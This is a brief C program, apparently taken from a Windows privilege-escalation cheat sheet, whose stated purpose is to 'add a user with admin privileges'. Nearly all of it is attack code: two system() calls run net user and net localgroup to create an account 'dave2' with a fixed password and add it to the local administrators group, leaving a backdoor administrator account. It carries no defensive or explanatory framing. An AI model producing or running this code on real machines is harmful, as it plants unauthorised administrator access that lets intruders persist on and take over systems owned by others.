C

Create a small binary to add a user with admin privileges:

#include <stdlib.h>
        
int main ()
{
    int i;

    i = system ("net user dave2 password123! /add");
    i = system ("net localgroup administrators dave2 /add");

    return 0;
}